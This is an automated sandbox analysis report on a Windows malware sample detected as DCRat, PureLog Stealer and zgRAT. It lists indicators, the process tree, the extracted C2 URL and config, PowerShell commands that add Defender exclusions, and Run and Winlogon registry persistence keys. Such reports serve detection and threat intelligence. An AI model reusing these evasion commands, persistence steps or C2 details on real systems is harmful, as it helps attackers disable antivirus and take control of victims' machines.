
Windows Analysis Report
DCobxod.exe

Overview

General Information

Sample name: DCobxod.exe
Analysis ID: 1590003
MD5: bc4a8996f18f14f3c77fff13fd23b00d
SHA1: 431779aa67e97a32824956d9f3c9122a8340486b
SHA256: 58040788269169456e7831099188a99796227cac63cc28771496d9f97204b895
Tags: DCRat, exe, NyashTeam, user-MalHunter3

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Suspicious execution chain found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • DCobxod.exe (PID: 5972 cmdline: "C:\Users\user\Desktop\DCobxod.exe" MD5: BC4A8996F18F14F3C77FFF13FD23B00D)
    • wscript.exe (PID: 4424 cmdline: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6584 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • intoHostperf.exe (PID: 5828 cmdline: "C:\Browserhost/intoHostperf.exe" MD5: CADD0C3B32099635F889BA630C4697F4)
          • csc.exe (PID: 6672 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 2928 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE67.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 7084 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 6768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD.tmp" "c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • powershell.exe (PID: 2888 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3964 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\winlogon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5368 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\NetHood\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5272 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\LaSqLWtOcizKrlm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4396 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browserhost\intoHostperf.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7260 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7404 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7532 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • Conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • upfc.exe (PID: 4796 cmdline: C:\Recovery\upfc.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • upfc.exe (PID: 2724 cmdline: C:\Recovery\upfc.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • explorer.exe (PID: 3176 cmdline: C:\Users\Default\NetHood\explorer.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • LaSqLWtOcizKrlm.exe (PID: 6160 cmdline: C:\Browserhost\LaSqLWtOcizKrlm.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • LaSqLWtOcizKrlm.exe (PID: 1644 cmdline: C:\Browserhost\LaSqLWtOcizKrlm.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • winlogon.exe (PID: 3872 cmdline: "C:\Users\All Users\SoftwareDistribution\winlogon.exe" MD5: CADD0C3B32099635F889BA630C4697F4)
  • winlogon.exe (PID: 768 cmdline: "C:\Users\All Users\SoftwareDistribution\winlogon.exe" MD5: CADD0C3B32099635F889BA630C4697F4)
  • explorer.exe (PID: 7604 cmdline: C:\Users\Default\NetHood\explorer.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • intoHostperf.exe (PID: 7636 cmdline: C:\Browserhost\intoHostperf.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • intoHostperf.exe (PID: 7656 cmdline: C:\Browserhost\intoHostperf.exe MD5: CADD0C3B32099635F889BA630C4697F4)
  • cleanup
{"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-l6SyUDRxjaImQy2wOPXg", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
DCobxod.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
DCobxod.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Browserhost\LaSqLWtOcizKrlm.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Browserhost\LaSqLWtOcizKrlm.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Browserhost\LaSqLWtOcizKrlm.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Browserhost\LaSqLWtOcizKrlm.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: intoHostperf.exe PID: 5828 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.DCobxod.exe.6c0e6ef.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.DCobxod.exe.6c0e6ef.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.DCobxod.exe.6c0e6ef.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.DCobxod.exe.6c0e6ef.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.DCobxod.exe.75296ef.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Default\NetHood\explorer.exe, CommandLine: C:\Users\Default\NetHood\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\NetHood\explorer.exe, ProcessId: 3176, ProcessName: explorer.exe
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetFilename: C:\Users\Default\NetHood\explorer.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: "C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe", EventID: 13, EventType: SetValue, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LaSqLWtOcizKrlm
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', ProcessId: 2888, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Users\Default\NetHood\explorer.exe, CommandLine: C:\Users\Default\NetHood\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\Default\NetHood\explorer.exe, ProcessId: 3176, ProcessName: explorer.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: explorer.exe, "C:\Recovery\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", ProcessId: 6672, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', ProcessId: 2888, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DCobxod.exe", ParentImage: C:\Users\user\Desktop\DCobxod.exe, ParentProcessId: 5972, ParentProcessName: DCobxod.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe" , ProcessId: 4424, ProcessName: wscript.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Browserhost\intoHostperf.exe, ProcessId: 5828, TargetFilename: C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\upfc.exe', ProcessId: 2888, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\All Users\SoftwareDistribution\winlogon.exe", CommandLine: "C:\Users\All Users\SoftwareDistribution\winlogon.exe", CommandLine|base64offset|contains: , Image: C:\ProgramData\SoftwareDistribution\winlogon.exe, NewProcessName: C:\ProgramData\SoftwareDistribution\winlogon.exe, OriginalFileName: C:\ProgramData\SoftwareDistribution\winlogon.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\All Users\SoftwareDistribution\winlogon.exe", ProcessId: 3872, ProcessName: winlogon.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Browserhost/intoHostperf.exe", ParentImage: C:\Browserhost\intoHostperf.exe, ParentProcessId: 5828, ParentProcessName: intoHostperf.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline", ProcessId: 6672, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-13T13:19:54.776592+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49883 | 104.21.16.1 | 80 | TCP
2025-01-13T13:20:13.438185+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49975 | 104.21.16.1 | 80 | TCP
2025-01-13T13:20:22.485135+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49976 | 104.21.16.1 | 80 | TCP
2025-01-13T13:20:49.141323+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49977 | 104.21.16.1 | 80 | TCP
2025-01-13T13:20:57.985056+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49978 | 104.21.16.1 | 80 | TCP
2025-01-13T13:21:03.341431+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49979 | 104.21.16.1 | 80 | TCP
2025-01-13T13:21:07.889970+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49980 | 104.21.16.1 | 80 | TCP
2025-01-13T13:21:15.125698+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49981 | 104.21.16.1 | 80 | TCP
2025-01-13T13:21:20.531985+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49982 | 104.21.16.1 | 80 | TCP
2025-01-13T13:21:27.422609+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49983 | 104.21.16.1 | 80 | TCP
2025-01-13T13:21:32.953796+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49984 | 104.21.16.1 | 80 | TCP
2025-01-13T13:21:39.938198+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49985 | 104.21.16.1 | 80 | TCP


AV Detection

Source: DCobxod.exe; Avira: detected
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe; Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Recovery\upfc.exe; Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Browserhost\intoHostperf.exe; Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe; Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe; Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe; Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\AppData\Local\Temp\ZtWwdj1Vck.bat; Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe; Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: DCRat {"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-l6SyUDRxjaImQy2wOPXg", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Users\user\Desktop\CdhQCsIu.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\DaJYXsXp.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\GTYGJoJn.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\NzFoXiJZ.log; ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QQZxdmXS.log; ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\TBFNkAhL.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\WuUwVxTJ.log; ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ZuimMgmz.log; ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\pEXJLSDT.log; ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xpPRZvtG.log; ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\zmrZuvIB.log; ReversingLabs: Detection: 20%
Source: DCobxod.exe; Virustotal: Detection: 55%
Source: DCobxod.exe; ReversingLabs: Detection: 47%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.5% probability
Source: C:\ProgramData\SoftwareDistribution\winlogon.exe; Joe Sandbox ML: detected
Source: C:\Recovery\upfc.exe; Joe Sandbox ML: detected
Source: C:\Browserhost\intoHostperf.exe; Joe Sandbox ML: detected
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe; Joe Sandbox ML: detected
Source: C:\Browserhost\LaSqLWtOcizKrlm.exe; Joe Sandbox ML: detected
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe; Joe Sandbox ML: detected
Source: DCobxod.exe; Joe Sandbox ML: detected
Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp; String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp; String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-l6SyUDRxjaImQy2wOPXg","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp; String decryptor: [["http://733812cm.n9shteam.in/","DefaultWordpress"]]
Source: DCobxod.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DCobxod.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb; source: DCobxod.exe
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.pdb; source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.pdb; source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe; System file written: C:\Windows\System32\SecurityHealthSystray.exe
